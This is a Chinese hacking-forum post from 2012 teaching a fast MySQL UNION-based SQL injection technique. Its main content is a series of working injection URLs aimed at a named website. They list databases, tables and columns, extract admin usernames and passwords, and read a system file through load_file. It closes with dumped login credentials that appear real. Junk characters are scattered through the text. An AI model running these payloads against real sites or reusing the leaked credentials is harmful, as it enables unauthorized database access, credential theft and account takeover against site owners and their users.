中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似4 V5 Y: U* U0 _" A% l" v) L/ r
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
' F- p- A3 _7 t3 b' x/ F4 `
1 G( N5 c. |% |  j5 O7 [# ~, ~4 k
+ m3 S) B( l% L优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入6 m2 J% r3 `( s& L( C2 D2 ^2 p+ u
4 ^- R0 _1 _( m1 v0 ]9 K6 z4 B
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...6 O8 Y) y9 u' }6 ]
( e/ t' {* d! i6 ~. f1 a; V  k
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示# E9 Q- F3 |& i: _
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等7 K8 y( b& h1 R1 Q& M3 ^

3 _& d& w/ `5 ]$ r: r7 ~. `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
' G+ \* t5 Y5 k5 {
- |/ G$ Y6 G& {. s0 [% l7 _读出所有库:: D$ j* k8 i$ y5 J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA, M9 y! `2 K0 _& a
3 J$ D- _* R" v- j" h

3 `% d1 ~1 ]( I. t
* c4 I$ z4 J/ l# L& u+ f/ T读出所有表:
/ ~# ^& h' w. A* ^9 R, r- Xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
+ D# `% ?9 W  J2 T: L% e) p/ B: x4 p6 U3 E4 e
读出所有表字段:
6 d: N8 w( H5 ahttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
/ B% {; P8 B( w) ~*/ (97,100,109,105,110)为admin的ascii码 依次类推/ b0 i* ]! l: ~- O$ N! ]

7 K8 Y: A, N  e- o7 ]7 D. @读出所有表字段里的内容:
6 S+ Z' [; D5 z  u2 Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
  m3 T: C- g+ g7 m) [: F! V6 A/ i3 m5 A

9 r5 B# r8 K- G, `$ m- h  X
( E2 ^( p3 f3 y! C/ e. `5 a( y0 J  F
* H% I( S; `- O' o& e& z6 X( m2 A4 a' N: Z

8 e1 Q! P8 [/ ?/ v! Dhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
  ^6 Q0 f; X3 p+ q, x/ A3 L; f6 B+ j' F: Z
% L' a& j$ {& a* }; Y$ }
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23) _% T# P# M6 O7 y) M9 x4 Q

, A) m( Y  A/ N# G1 b  Mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23) Q. P* H/ @$ [) C4 u
& \3 x; Q8 o1 w5 o! J) z

% k- m* l  a  vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%231 k) G! ^& o6 n* K. U2 e

7 \$ B1 N; X1 V, n# J
! t; R7 t6 g  G& C        webmaster:dzb521123,simlab:simadmin20043233
$ S# @* G% s6 ]$ ^



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2